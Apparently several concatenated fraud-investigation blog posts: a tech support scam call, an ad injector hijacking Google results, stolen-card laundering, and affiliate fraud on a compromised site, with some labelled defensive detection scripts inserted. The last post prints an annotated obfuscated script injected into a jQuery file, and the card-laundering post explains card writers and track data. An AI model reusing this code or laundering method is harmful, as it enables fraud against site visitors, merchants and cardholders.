In the Tech Support scam, a scammer hijacks a well known brand in an effort to lure a victim who is then deceived into paying for an unnecessary/non-existent service or installing malware infected payloads.

This scam has been picked up by quite a few players in the last couple of years, successfully catching people left, right and center. If you want to bring yourself up to speed on how scammers have evolved in this space, you’ll find lots of documentation from the FTC, the Malwarebytes team and Microsoft.

When I think about a scam, of course the first question I ask is who is the victim, and eventually it’s interesting to figure out how the money flows. In today’s example, I’ll show you how a Tech Support scam flows from beginning to end. We’ll discuss who the victims are and we will examine the players that make money from all of this.

So with a couple of cell phones, a few false names and an intentionally flawed Virtual Machine (one which had not been activated) I decided to see what Tech Support scams looked like for myself.

The reason I chose a VM which had not yet been activated is because I wanted to see if the people I phoned for tech support pointed out the most obvious potential problem with the machine, i.e., that it had not yet been activated.

Online Advertising

On Friday the 23rd of May 2014, I found this Google advertiser:

It looks like he has an advertising campaign that is constantly running, targeting folks who are looking to log into their RoadRunner email:

5/23 – Google Advertiser URL leads to
5/23 – Google Advertiser URL leads to
5/24 – Google Advertiser URL leads to
5/27 – Google Advertiser URL leads to

For each of these ads, the landing page will display the following message:

“Attention: Your Account Has Been Disabled Please Call 1-855-666-8849”

google_advertiser_tech_support_scam_0It’s obvious what is happening here, but to be clear: this advertiser has hijacked the TWC Road Runner login page and is trying to deceive the user into thinking that there is a problem.

Depending on what your referrer to this page is (the site responsible for sending you here), the message could also be:

“Attention User Account Is Under Review Please Call RoadRunner Support 1-800-463-6338”

That the message/number changes matters not, for the intent remains the same: deception. In each case the advertiser has hijacked the TWC RoadRunner page and is trying to con the user into phoning the falsified tech support line.

What I thought was really interesting here is that they are not even bothering to steal credentials; they just want you to call in and fall victim to a quick scam that will send real dollars their way. Regarding the image below, note that I entered false credentials and then pushed Login. Upon analyzing a packet trace for this activity, I found no evidence of credentials being sent to a server.

“Error code: RR-D68547 Your Email Account Has Been Temporary Suspended Due to Suspicious Activity Detected. Please RoadRunner Support on +1-800-463-6338”

Not stealing credentials actually makes a whole lot of sense if you think about it a little. If they were stealing usernames and passwords then this would be an open and shut case. It would not take much for chaps like me to gather evidence against players that steal credentials in this manner, in which case they could land themselves in hot water pretty quickly.

Moving on, I called the guys behind 1-855-666-8849 a few times and each time I phoned they always answered with “Thank you for calling <GARBLED> technical support”. The <GARBLED> part is intentional from their side: they want you to think it’s your fault you did not hear them properly. Sometimes I asked what technical support they were, but I never got an answer.

Download audio

Unfortunately my initial attempts to get to the bottom of the scam didn’t get me very far. I think I came across as unconvincing, someone who may be a threat to their scam, and so each time they ended up putting the phone down on me. Upon reflection, I think my problem was that I assumed from the get go that they were trying to sell me an antivirus solution, so my guess is this is what kept throwing them off. They would always tell me my computer was broken/compromised, that things had gone wrong and they needed to access it. They never told me how to facilitate this; I told them I had no idea what they were talking about and kept waiting for them to take the lead.

As I kept trying to see what this particular tech support scam was all about, it became evident to me that where other scammers were trying to get folks to download and install something, these guys were up to something different.

So I involved a senior citizen (my dad!), someone who I figured was the real target of their scam.

The result was quite different.

Download Audio

Highlights of the call:

04:50 Scammers convince my father to let them take control of the machine. They ask him to load a URL, which redirects to another, where they then ask him to enter the code 24227.

07:10 My father asks who they are; he clearly says “Are you TWC?” This is followed by a moment of silence and then their response: “Yeah”

09:39 They have taken control of the machine, they then ask my father to log into his email so they can see the problem. What they did here was really sneaky. As he was typing in the password, they would keep pushing the caps lock key on their side, which meant that even if we were at the right service URL typing in the right credentials, it would be entered incorrectly and our login would be denied. This would open the doors for the scammers to prove that there certainly was a problem.

10:28 You can hear my father tapping the keyboard five times for a five character password and counting silently to himself. Mysteriously, a sixth character appears in the password prompt. Obviously the scammers are entering the final character to keep forcing incorrect credentials.

11:30 Scammer opens a command line window and types “EMAIL HAS BEEN HACKED”. My dad falls for this and starts to panic; when my father asks if his email has been hacked the scammer says “Yeah, that’s the problem sir, yeah”

13:58 Scammer says “don’t worry, I am here to help you” whilst trying to scare my father by showing him logs from the Windows event log, all of which are completely normal.

18:52 “are you a senior citizen sir?”

“Yes ma’am I am 76”

19:22 my father asks “are these experts from Microsoft?” to which the scammer responds “yes sir”

20:00 Scammer explains to my father the difference between what Best Buy’s Geek Squad offers and what they are offering. It’s all so confusing, but it’s supposed to be a good deal. Note the question my father asks at 20:50:

“And these are specialized technicians from Microsoft, Yes”

21:56 Scammer loads up the merchant panel and logs in with merchant id “ishan.865tasu”

For the first time we are privy to what their real identity may be, or at least what they are using to transfer funds: “International Technical Support Corporation”. If you’re following this call carefully, you know that the scammer just made a mistake on their side: they just logged my father directly into their merchant account. Obviously they don’t know that I just fell off the chair next to him.

22:50 They enter the Order ID ITSC102504 and try to convince my father to complete the form with his details. Note the question my father asks before trying to complete the form:

“Do you have special rates for over the age of 75?”

23:38 My father asks if he can spend the $599 over a period of time instead of one large payment. He explains that $600 is his rent for the month. They know he is an elderly gentleman, they know they are exploiting his trust. They know they are about to steal money that he cannot spare. What’s sad here is that my father is not a victim, but they don’t know that. How many elderly people have potentially fallen for this scam? We’re about to answer that question thanks to these guys logging us into their merchant account.

26:18 Scammer shares their address: “1113 6th ave, New Hyde Park, NY 11040”

31:00 Scammer becomes impatient after we click refresh, nullifying everything we had spent the last ten minutes completing. She decides to transfer us to another scammer, but we decide to end her remote session and take a closer look at their merchant account.

Of interest to me at that point in time was how much money these unscrupulous individuals had made thus far. I used the QuickBooks feature of the merchant panel to get a quick idea.

Just to be clear here, for this account alone the scammers have conned 1538 people with this scam. At a total of $439,254.91, they are averaging $258 per person. What’s more terrifying here is the extremely low 3% rate of chargebacks/reversals: these are the people who were savvy enough to see the scam and then demand a refund from their credit card company.

I shouldn’t have to say that this practice is unscrupulous. These are without a doubt scammers of the lowest possible order, bottom feeders that target old people and those that are not tech savvy enough to know any better.

The Players

1. Google facilitates the first part of this scam by allowing advertisers of this ilk onto their network. Average users, old people, kids, moms, tech elites, you name it, they trust the results given to them from a search engine. So why shouldn’t they trust what the page behind that first click tells them: “Attention: Your Account Has Been Disabled Please Call 1-855-666-8849”. After all, there’s no warning on the search result page saying “Hey be careful of these advertisers, we have no idea who they are or what they are going to try to sell you!”

Obviously the scammers know how trust is delegated here, so they will pay Google to exploit this as an advertiser for as long as they are allowed to do so.

But is Google a victim? Sure. Whilst they are taking the scammers money to show the ads in question, they are also indirectly a victim. Fingers will point to services the likes of theirs when one tracks back the scam to its origin.

2. NMI.COM – Network Merchants LLC, for a fee I presume, is allowing the money to flow from the target of the scam (my senior citizen dad in this case) through to the scammers. At the end of the day what the scammers are doing here is wire fraud, plain and simple. So if NMI didn’t know about the half million dollars these scammers potentially defrauded from victims before, they sure know about it now.

3. TWC Road Runner. They’re another victim. It’s their service that is being hijacked and their users plundered. Ultimately victims are dialing the support number listed because they thought TWC Road Runner disabled their account.

4. Microsoft. The scammers are using legitimate programs on a Microsoft Operating System to make the victims think something is wrong with Microsoft software. We know that it’s all just a lie though: the event viewer is filled with legitimate warnings and errors. Typing “EMAIL HAS BEEN HACKED” in a command prompt does not mean that your email is hacked.

Furthermore, they hijack the Microsoft brand by saying that they are from Microsoft. Recall 19:22 where my father asks “are these experts from Microsoft?”

“yes sir”

5. The scammers themselves. From the Google ad landing pages, we know of three domains that they are using:, and Whois pages for these (here, here and here) list Dayanad Colony as the registrant using the number +91.9818290300 and email address

So what now?

Why are unscrupulous advertisers of this ilk allowed to run rampant? How is it that they can get away with something like this over and over again? Why aren’t the players responsible for playing a part in all of this (knowingly or unknowingly) made accountable here?

There’s no shortage of articles on bad guys like this [1,2,3,4] and from the merchant account above it’s obvious that these guys are profitable, so what gives?

The bottom line is that it’s the innocent consumers that are being nailed over and over again. Hard legal action coming in on the tail end of these scams is just not going to solve anything. In my mind I see the need for a very big and very angry gorilla stepping into the arena of online advertising sometime soon, and its name is regulation.

* 5/29/2014 – download links to the audio added *

* 6/3/2014 – scammer is still running strong through AdWords (Advertiser URL), now using the domain and the number 1-855-808-1175 *

Search for “download skype”, “download google chrome”, “download firefox” or a myriad of other popular applications and you may find yourself unlucky enough to run into an ad injector.

Now an ad injector won’t present itself as an ad injector. Typically, it will bundle itself into an installer which will opt the user into installing a handful of programs onto her machine in addition to what she was originally looking for.

Sure, technical elites out there have no problem picking up on the subtle clues from an installer that an ad injector lies in waiting (maybe they read the entire license agreement sometimes pointed to at the bottom of the screen), but less tech savvy folks think they are only getting what they were searching for. Nothing less, and arguably most important: nothing more.

Obviously, that’s not the case in today’s example, as we discuss an ad injector making the rounds and going by the name of Bee Coupons.

In the images below, with Bee Coupons installed courtesy of an installer on what was originally an uncompromised machine, I searched for “click fraud” on Google. Google comes back with its responsive UI and I see exactly what I was expecting less than a second after pushing enter:

Unfortunately, whilst Google was fetching its response to the “click fraud” query, the Bee Coupons software was getting a result of its own. A few seconds pass and Bee Coupons decides to “enhance” Google’s search result with an addition of its own:

clickety clicky, kechang!

Of course the “enhanced results” aren’t really enhanced results at all, they’re ads. Upon clicking on those ads an advertiser will be charged a fee. The advertisers involved in this particular transaction are and They may or may not be willing participants in this, for the online advertising ecosystem is fraught with so many complexities and third parties, that unless you sit and dissect a packet trace from start to finish every single time, it’s difficult to conclusively say who is who. Nonetheless, the odds are that Zoosk and Ask will be charged a fee upon a click.

But then where does the money go?

Good question, ordinarily the money would go to Google. You see, that’s how they fund the largest search engine on the planet, with ads from their own advertising network. More often than not they have a direct relationship with the advertiser. When Google is the publisher of an ad and the advertising network as well then they collect 100% of the fee. There are instances where Google is not the publisher of the ad, but facilitates delivery of the ad through their ad network, in which case Google still collects a fee from the advertiser, a portion of which is then given to the publisher.

I’m confused, how does Google make money here?

Google does not make money here, for whilst they are the publisher in this example they will not be paid upon someone clicking on the Zoosk or Ask ads. This is because those are ads that were not put there by Google. The ads belong to an entirely different advertising network that has hijacked the Google Search Result Page and inserted their own means of generating revenue.

Now the first rebuttal offered from an ad injector is that they received the permission of the user operating the computer in question to do this. Whilst this statement may be true (assuming the operator was not a child — popular target of installers), it’s inconsequential for they did not receive permission from the entity that mattered: the real publisher of the content, i.e., Google.

So to be clear, again, the ads that have been injected into Google’s site do not belong to Google.

So who do they belong to?

I clicked on the little “i” next to “Ads by Bee Coupons” and was directed to a page on that offered to explain why I was seeing the ads in question:

You may be seeing ads as part of our advertising solution for Internet properties (such as websites or web browser extensions). This solution provides content at no cost to you and displays advertisements during your web browsing experience. It was installed by you, or someone using your computer.

“at no cost to you” is highlighted because this statement cannot always be true. If you are the publisher of content on the Web (say Google, for example) and Bee Coupons comes along and pushes your top advertisers down (who bid good money to be there) in order to make room for Bee Coupon’s advertisers, then there may indeed be a cost to you. The user that clicked on Bee Coupon’s ads did not click on your ads, which is ultimately money that should have been sent your way. Not earning when you could have is most definitely a cost and if you were Google in our example above then you shall bear the brunt of it.

What’s more interesting here is that the “advertising solution” installed on the machine (Bee Coupons in my case) is not available for download from In fact, I could not find any advertising solution software at all, and that’s where the installers come in.

It’s worth spending a few more moments looking at

Revenue Skyrockets with Solutions from Advertising Support!

Solutions that are divided up into two categories, advertisers and publishers.

For advertisers:

advertising-support claim | iPensatori comments
Competitive Rates | This is the very reason why ad injectors exist at all: they offer competitive pricing. Instead of playing ball with the rest of the industry on advertising networks that have established prices and that have permission to place their ads on a publisher’s site, advertisers enjoy better placements on premium publisher properties at lower rates with ad injectors.
Traffic in all countries | Welcome to the Internet.
High quality traffic | It most certainly is. This is why advertisers pay the big bucks to be in the #1 spot on Google.

For publishers:

advertising-support claim | iPensatori comments
Very easy to implement | One can’t help but wonder which publishers they are talking about here. It’s certainly not the publisher of the content (Google in our example), although if it were then it is indeed pretty easy to implement: Google did nothing.
Non-Intrusive to users | No comment.
Maximized Earnings | ?

Other Publishers Receiving Enhanced Ads

Google is not the only target of Bee Coupons. In order to satisfy the claims made above they have to inject ads into a number of top quality publishers. I captured a few samples below.

Enter the Affiliate

Affiliates are masters of marketing, which makes sense and in a way justifies the whole industry. A small company that is really good at putting together trips to the Amazon jungle may not know the ins and outs of online marketing, or even care to know them, since its specialty is trips to the Amazon jungle, so why concentrate on anything other than improving that service? As a result it is well within its interest to offload the marketing portion of the business onto affiliates in return for cutting them in on a slice of the pie when there is a sale. How wonderful!

Wonderful, that is, until a rogue affiliate enters the picture.

This packet trace steps us through the chain of events that happened behind the scenes upon clicking on the first Amazon advertiser provided by Bee Coupons:

  • Our adventure begins with a GET request with no Referer header (the header that names the entity responsible for the traffic, usually the publisher). The response is JavaScript that creates an element in the DOM and clicks on it. There are many reasons for doing this, one of which is to pick up a brand new referrer.
  • The automated click from the JS above results in a second GET request, with the Referer header now set to the first URL. The response here includes JS which redirects the browser to yet another script.
  • The response from that script redirects to a final URL, which uses JS to redirect to Amazon via an Amazon affiliate link.

The net effect is that one of Amazon’s affiliates (affiliate id advertiseco0e-20) basically outbid Amazon (with probably less money, thanks to the injector) for the top spot on Google when searching for Amazon. If the user searching for Amazon clicks on this ad and then buys something from Amazon within a certain period of time (say 24 hours), then the affiliate responsible for purchasing the ad from the injector will be paid a commission.
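Reconstructing that chain from a capture is something a publisher or an affiliate program can automate. The following is an added example (not code from the original post or from any of the parties named in it), written in JavaScript for Node: it takes a small constructed request log with placeholder hosts (injector.example, laundry.example, merchant.example) and a placeholder affiliate tag, follows Referer links forward from every request that arrived with no Referer and returned script, and reports chains that terminate at an affiliate-tagged URL.

```javascript
// Added example: spot the referrer-laundering chain behind an injected ad click.
// All hosts, paths and the affiliate tag below are constructed placeholders.

const ADS_REQUEST_LOG = [
  // ts = milliseconds since the first request in the capture; type = response Content-Type
  { ts: 0,   url: "https://injector.example/click?ad=42", referer: "",                                     type: "application/javascript", status: 200 },
  { ts: 120, url: "https://laundry.example/r",            referer: "https://injector.example/click?ad=42", type: "application/javascript", status: 200 },
  { ts: 250, url: "https://laundry.example/go",           referer: "https://laundry.example/r",            type: "text/html",              status: 302 },
  { ts: 260, url: "https://merchant.example/?tag=affiliate-placeholder-20", referer: "https://laundry.example/go", type: "text/html", status: 200 },
  // unrelated traffic from the same capture; must not end up in any chain
  { ts: 300, url: "https://search.example/search?q=amazon", referer: "",                                   type: "text/html",              status: 200 },
];

// Follow Referer links forward from one request: the next hop is the first later
// request whose Referer equals the current hop's URL.
function followChain(log, start) {
  const chain = [start];
  let current = start;
  for (;;) {
    const next = log.find(r => r.ts > current.ts && r.referer === current.url);
    if (!next) break;
    chain.push(next);
    current = next;
  }
  return chain;
}

// Pull an affiliate tag out of a URL (assumption: an Amazon-style "tag" query parameter).
function affiliateTag(url) {
  try { return new URL(url).searchParams.get("tag"); } catch (e) { return null; }
}

// A laundered click: starts with no Referer, the first response is script (the
// self-clicking element), and the chain ends at an affiliate-tagged URL.
function findLaunderedClicks(log) {
  const findings = [];
  for (const req of log) {
    if (req.referer !== "" || !req.type.includes("javascript")) continue;
    const chain = followChain(log, req);
    const last = chain[chain.length - 1];
    const tag = affiliateTag(last.url);
    if (chain.length >= 2 && tag) {
      findings.push({ hops: chain.map(r => r.url), affiliateTag: tag, elapsedMs: last.ts - req.ts });
    }
  }
  return findings;
}

console.log(JSON.stringify(findLaunderedClicks(ADS_REQUEST_LOG), null, 2));
```

On a real capture the "returned script" condition comes from the response Content-Type, and the affiliate parameter name differs per program; the shape of the check (no Referer in, laundered Referer out, affiliate link at the end) is what carries over.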

Amazon may allow this behavior, but it seems unlikely that they do. Some simple reasons why not:

  1. Ultimately Amazon will be paying a commission on traffic that they would have received anyway, for not only were they the first ad displayed before the injector arrived, but they were the first organic link displayed as well.
  2. This practice is awfully unfair to the honest Amazon affiliates out there that don’t know about ad injectors, since their cookies will be overwritten by the affiliate using the ad injector.

I’ve spent the last few years presenting at a number of affiliate conferences, meeting and shaking hands with affiliates in person, people who make affiliate marketing their primary means of making ends meet. They don’t know how to broker relationships with questionable traffic sources. They’re not programmers. They have never heard of practices the likes of referrer laundering, blackhat marketing, cookie-stuffing or pay per view marketing and they most certainly don’t know the ins and outs of ad injectors.

So if you’re an honest Amazon affiliate competing for the same traffic that this ad injector is sending to Amazon affiliate advertiseco0e-20, know this: you don’t stand a chance.

Fraudster on the roof

This post is the second entry in the “Fraudster on the Roof” series. Please remember that the intention of this series is for readers to learn how to better detect fraud, not to improve how they implement it.

Today we look at what it takes to launder money online, specifically through stolen credit cards.

I spend a lot of time thinking about the underground economy. What’s always fascinating to me is that the Web seems to provide a false sense of security to scammers, who feel nothing flaunting their illegal services in full view of authorities and anyone that really cares to take a look. Pastebin is a surprising resource here. Point your browser to your favorite search engine and type in the following query:


The thousands of results returned include scammers that are selling everything from card data to bank logins, botnets, PayPal accounts and complete online identities.

On stolen credit cards, the price per market and card type averages out to the following:

Market          Card type            Average price
United States   American Express     $7.00
United States   Discover             $8.00
United States   Visa & Mastercard    $4.50
Europe          American Express     $12.50
Europe          Discover             $18.00
Europe          Visa & Mastercard    $14.50
Asia            American Express     $18.00
Asia            Discover             $18.00
Asia            Visa & Mastercard    $15.00

From my own reading here, it looks like prices double on average when the card is sold with information on the person that the card belonged to (address, name et cetera).

As I scroll through the services listed on Pastebin, I think about what buyers do with this data and how they really make any serious money. All too often one hears about ‘data breach here’ and ‘millions of accounts compromised there’, but how does this equate to scammers making money? I’m not talking about scammers that sell the data card by card, I am referring to the scammers that buy it.

Perhaps the simple answer is that with a stolen credit card one could go buy a whole bunch of items from an online market and then resell them. But where would one deliver the goods from the initial purchase to? An entry level scammer may interrupt now and say that you don’t deliver it to yourself, because the goal is to launder the card as quickly as you can and make a clean getaway. One way to do this is to sell items at a discount on online market A; once these sell, you buy the product through online market B with the stolen card and ship it to the buyer from market A. Easy.

It’s a simple scam, but scammers are lazy and this sounds like too much work, mostly in the sense that it takes so long to make it all happen. Money would only slowly trickle in, and by the time it starts producing any meaningful income the account on A could get closed at any time (the buyer reports the seller after the cops come knocking).

Higher earnings can be found by mixing the offline and online world, where scammers take more risk by doing things in person but stand to make greater profit over fewer transactions. To make things happen in the offline world, scammers push the stolen card data they bought online onto a physical card that can be swiped offline.

Admittedly I am not an expert in offline credit card fraud (detection), but from what I have read it’s surprisingly easier to get up to speed here than I thought it would be. A few searches on eBay for the model number of a card writer (“MSR605”) yield a list of auctions with card writers that are ready to roll for less than $150.

Note that the software provided with the writer facilitates pushing track 1/2/3 data onto an offline card. Track 1/2/3 is the credit card data for sale on the underground economy — it is stored on the magnetic stripe of your card.

credit card track 2 data
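The defender’s counterpart to the track-data market is making sure track data never sits in your own logs, memory dumps or outbound traffic, which is what the PCI rules on storage are about. The following is an added example, not part of the original post: a small Node script that scans text for strings laid out like track 2 data (PAN, “=”, YYMM expiry, three-digit service code, discretionary data, terminated by “?”), keeps only those whose PAN passes the Luhn check, and reports them with the PAN masked to the first six and last four digits. The sample log lines are constructed and use the well-known Visa test number 4111111111111111, not a real card.

```javascript
// Added example: find track-2-shaped records in text and report them masked.
// Track 2 layout (ISO 7813): ;<PAN>=<YYMM><service code><discretionary data>?

const TRACK2_RE = /;(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d*)\?/g;

// Luhn check: every issued PAN passes it, which filters out random digit runs
// that happen to match the layout.
function luhnValid(pan) {
  let sum = 0, dbl = false;
  for (let i = pan.length - 1; i >= 0; i--) {
    let d = pan.charCodeAt(i) - 48;
    if (dbl) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    dbl = !dbl;
  }
  return sum % 10 === 0;
}

// First six and last four digits may be shown; everything between is masked.
function maskPan(pan) {
  return pan.slice(0, 6) + "*".repeat(pan.length - 10) + pan.slice(-4);
}

// Return one finding per track-2 record whose PAN passes Luhn and whose
// expiry month is plausible. The raw PAN is never placed in the result.
function findTrack2(text) {
  const findings = [];
  for (const m of text.matchAll(TRACK2_RE)) {
    const [, pan, yy, mm, serviceCode] = m;
    if (!luhnValid(pan)) continue;
    if (+mm < 1 || +mm > 12) continue;
    findings.push({ offset: m.index, maskedPan: maskPan(pan), expiry: `20${yy}-${mm}`, serviceCode });
  }
  return findings;
}

// Constructed sample: a debug log that wrongly wrote a swipe to disk, plus noise.
const SAMPLE_LOG = [
  "2014-06-01 10:02:11 POS debug: swipe=;4111111111111111=2512201123456789?",
  "2014-06-01 10:02:12 POS debug: swipe=;4111111111111112=2512201?",   // fails Luhn
  "2014-06-01 10:02:13 order 4111 shipped",
].join("\n");

console.log(findTrack2(SAMPLE_LOG));
```

The same layout check with a different regular expression covers track 1 (which starts with “%B”, carries the cardholder name, and uses “^” as the field separator); track 3 is rarely present on payment cards.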

A scammer that is printing his/her own cards can then purchase fairly expensive and hard to track items from offline stores (jewelry), which can then be sold at a discounted rate online. Since the scammer paid nothing for the items that have been purchased, his profit is a function of the resources allocated to buying from offline stores and the effort required to sell online. The disconnect between offline and online, and making sure only to purchase hard to track items, mitigates the risk of the scammer’s online account responsible for sales being reported and his efforts going to waste.

As mentioned earlier, there’s a fair amount more risk involved with this scam, in the sense of getting caught and going to jail. Obviously moving the scam offline means that the scammer has to participate in the physical world that is bound to the same laws of the people that he/she is stealing from. A savvy jewelry clerk could smell a bad deal and call the cops whilst putting on a ruse for the scammer. A card could have been reported as stolen between purchasing the data and printing it to a card, prompting a call to the credit card company when swiping the card.

“keep him busy, cops are on the way”

There’s just too much risk here.

Any competent scammer looking to make real money wouldn’t like this scam, so would either contract this work out (less risk, less reward) or stay away from it completely.

So where to next?

Hustle and Flow

Let’s take a moment to appreciate the relationship of each of the players involved in the scam that we have discussed thus far:

scammer hustle and flow

  • Scammer – deals with the Market and the Merchant. Has a stolen credit card and intends to use it to steal as much cash as possible (and still make a clean getaway)
  • Market – scammer will foster a relationship with the market in order to sell goods to a buyer
  • Merchant – sells goods/services to consumers. Scammer will buy goods using a stolen credit card and sell them at a discounted price to a buyer through the market. Merchant can also be the market
  • Buyer – the party on the other side of the transaction facilitated by the market

If there ever was a conference where all the fraudsters sat down and discussed their strategies, then at one time or another perhaps a more strategic fraudster would present his thoughts on the weakest links in their ecosystem.

“Fellow fraudsters, blackhatters and scammers, as many of you are surely aware, we’re being hit left and right with anti-abuse and fraud detection efforts. We’re no longer in the good ol’ wild west days of the 90s, and so as much as we have to cover our tracks more than ever before, we must also improvise our methods. Make no mistake about it: knowledge and creativity will be our strongest asset if we want to be successful in the future”

He’d then present something similar to the following:

scammer hustle and flow 2

Now it’s not obvious to think like this. What’s important to remember is that all the fraudster is doing here is eliminating bottlenecks and potential risks in order to optimize his path to profit. So ultimately what the fraudster is saying, is why waste time with merchants and legitimate buyers when the enterprising fraudster can be both!

The Scam

It’s really simple, deceptively so, but the scam is for the fraudster to be both the buyer and the seller and not have to depend on a merchant for a supply of goods and/or services. By selling to himself at a price that he thinks is about right, he launders the stolen credit card through the market in a manner that is quick and almost risk free.

“That’s good in theory, but where would you apply this idea?”

When you think about a fraudster being both the buyer and the seller, then certain scenarios that used to be quite puzzling suddenly become rather clear.

App Stores

These markets make for prime targets. Just think about it a little, fraudsters can sell something that cost next to nothing to build (basically it’s just the cost of cycles on their CPU to build an empty app) and the market will happily onboard yet another publisher in their ever increasing app store (now with millions of apps!).

Since the app store takes care of processing the buying and selling of the apps, it’s up to the fraudster only to make sure that each purchase he makes from himself with a stolen card (as many as possible whilst being careful not to raise any alarms) looks legitimate. The app store market will take care of the rest, and voila: credit card(s) laundered.
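A store can look for this on its side, because what is invisible per purchase shows up per publisher. The following is an added example, not from the original post, in JavaScript for Node: over a constructed set of purchases (card values are tokens, not card numbers), it computes for each publisher what share of its buyers bought nothing else on the store and what share of its sales were later charged back, and flags publishers where both are high. The thresholds are assumptions chosen for the sample data, not figures from the post.

```javascript
// Added example: a per-publisher view of the "publisher is also the buyer" pattern.
// Purchases below are constructed; card fields are tokens, not card numbers.

const PURCHASES = [
  { card: "tok-a1", publisher: "pubA", amount: 2.99, chargedBack: false },
  { card: "tok-a2", publisher: "pubA", amount: 2.99, chargedBack: true  },
  { card: "tok-a3", publisher: "pubA", amount: 2.99, chargedBack: false },
  { card: "tok-a4", publisher: "pubA", amount: 2.99, chargedBack: true  },
  { card: "tok-b1", publisher: "pubB", amount: 0.99, chargedBack: false },
  { card: "tok-b2", publisher: "pubB", amount: 0.99, chargedBack: false },
  { card: "tok-b1", publisher: "pubC", amount: 4.99, chargedBack: false },
  { card: "tok-b2", publisher: "pubC", amount: 1.99, chargedBack: false },
  { card: "tok-b3", publisher: "pubB", amount: 0.99, chargedBack: false },
];

// Aggregate purchases into one profile per publisher.
function publisherProfiles(purchases) {
  // how many distinct publishers each card has bought from across the whole store
  const publishersPerCard = new Map();
  for (const p of purchases) {
    if (!publishersPerCard.has(p.card)) publishersPerCard.set(p.card, new Set());
    publishersPerCard.get(p.card).add(p.publisher);
  }
  const acc = new Map();
  for (const p of purchases) {
    const a = acc.get(p.publisher) || { sales: 0, revenue: 0, chargebacks: 0, cards: new Set(), exclusiveCards: new Set() };
    a.sales += 1;
    a.revenue += p.amount;
    if (p.chargedBack) a.chargebacks += 1;
    a.cards.add(p.card);
    // a card that bought from this publisher and nobody else is an "exclusive" buyer
    if (publishersPerCard.get(p.card).size === 1) a.exclusiveCards.add(p.card);
    acc.set(p.publisher, a);
  }
  const profiles = {};
  for (const [name, a] of acc) {
    profiles[name] = {
      sales: a.sales,
      revenue: Math.round(a.revenue * 100) / 100,
      chargebackRate: a.chargebacks / a.sales,
      exclusiveBuyerShare: a.exclusiveCards.size / a.cards.size,
    };
  }
  return profiles;
}

// Flag publishers whose buyers exist only to buy from them and whose
// chargebacks already run well above normal. Thresholds are assumptions.
function flagSelfDealing(purchases, { exclusiveShare = 0.9, chargebackRate = 0.25 } = {}) {
  const profiles = publisherProfiles(purchases);
  return Object.entries(profiles)
    .filter(([, s]) => s.exclusiveBuyerShare >= exclusiveShare && s.chargebackRate >= chargebackRate)
    .map(([name]) => name);
}

console.log(publisherProfiles(PURCHASES), flagSelfDealing(PURCHASES));
```

Chargebacks arrive weeks after the sale, so the exclusive-buyer share is the earlier of the two signals; a store that pays out publishers on a delay can hold funds on the strength of that share alone and confirm with the chargeback rate later.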

With this in mind, maybe now you’ll have an answer to the following question next time you are browsing around a very large app store:

“Why on earth would anyone actually pay money for this app? It just doesn’t do anything.”

The site in question ranks in the top 54,000 sites world-wide. Load it up in your browser and you’ll see nothing out of the ordinary. Fire up a Web debugger and monitor the outbound traffic from your machine though, and you will see an entirely different story: affiliate fraud.

This site has been compromised and the attacker (aka babyface) is using it to force the user’s browser into invisibly visiting a number of merchants via affiliate links. If the user then buys anything from the merchants in question within a certain amount of time, the fraudster behind all of this is paid a commission.

As always, finding the fraud is easy but telling the story of how it happens is the tricky part. This one had me stumped for a few minutes, so if you are up for a challenge then try it out for yourself before reading any further. If you’re still stumped, then let’s begin.

With reference to this packet log, loading up the site results in a request for the Flash payload, which is then responsible for requesting the ASP file. The ASP file returns a list of URLs (affiliate clicks included); the Flash payload in the browser then invisibly requests each of the links, and the cookies returned in these lookups result in forced/faked affiliate clicks.

The question now is where the initial request for the Flash payload comes from, i.e., what exactly is responsible for it? If you do a search for it statically (scan the HTML, search the packet trace) you’re not going to find the element responsible. And if you do a dynamic search (via the DOM) you’re still not going to find it. Babyface, like many of the technical marvels among blackhats in this space, was not the brightest bulb on the ever shrinking Christmas tree specially reserved for them: he was totally predictable.

Take a look at and you’ll find what looks to be a jQuery library. But keep digging and you’ll come across something that shouldn’t be in there:

(function(){if(document.cookie.indexOf(String.fromCharCode(98, 97, 98, 121, 102, 97, 99, 101))==-1){try{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);var c=document;c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)+"=Yes;path=/;expires...

In compromising this site, he has hidden his activities in this jQuery library. I've broken this down with the addition of my own comments (that's everything after //):

// so what we have here is code that will run every single time 
// loads on a javascript enabled browser
(function(){
  // Babyface is checking to see if a certain cookie has been set. 
  // If it has not then the following code will be executed. 
  // Instead of putting the name of the cookie as a string in the code
  // this genius has tried to throw investigators off of his tracks 
  // by making it a sequence of characters, when you evaluate these 
  // characters the name of the cookie comes out to "babyface" 
  if(document.cookie.indexOf(
    String.fromCharCode(98,97, 98,121, 102,97,99,101))==-1){
    try{
      var expires=new Date();

      // babyface sets an expiry date for the cookie
      // 24*60*60 = 86400 seconds which is one day. so basically
      // he doesn't want to repeatedly attack the same browser
      // if it visits the site more than once in 24 hours
      expires.setTime(expires.getTime()+24*60*60*1000);
      var c=document;
      c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)
        + "=Yes;path=/;expires="+expires.toGMTString();
      var s=c.createElement("span");

      // getting ready to inject a flash payload which will kick 
      // off the attack. The payload is delivered from character 
      // sequence below which equals ""
      var p=String.fromCharCode( /* character codes of the payload URL */ )
        + "?i=" + (new Date()).valueOf();
        '<object type="application/x-shockwave-flash" data="'+p
        +'" width="1" height="1"> ';
    }catch(e){}
  }
})();

So the JavaScript above answers our earlier question of what is responsible for the request to The SWF that is loaded as a result of this JavaScript then calls an ASP file which has all of the links to which a visit will be forced. This SWF decompiles to the following dreadful code:

package flashcs_old_fla {
    import flash.display.*;
    import flash.events.*;
    import flash.net.*;
    import flash.system.*;

    public dynamic class MainTimeline extends MovieClip {
        public var loader:URLLoader;
        public var url:String;
        public var reqURL:URLRequest;

        public function MainTimeline(){
            addFrameScript(0, frame1);
        }

        function frame1(){
            url = "";
            reqURL = new URLRequest(url);
            loader = new URLLoader(reqURL);
            loader.addEventListener(Event.COMPLETE, handleComplete);
            loader.dataFormat = URLLoaderDataFormat.VARIABLES;
        }

        public function handleComplete(_arg1:Event):void{
            var loader:* = null;
            var safe:* = NaN;
            var url1:* = null;
            var url2:* = null;
            var url3:* = null;
            var url4:* = null;
            var url5:* = null;
            var url6:* = null;
            var url7:* = null;
            var url8:* = null;
            var url9:* = null;
            var url10:* = null;
            var url11:* = null;
            var url12:* = null;
            var url13:* = null;
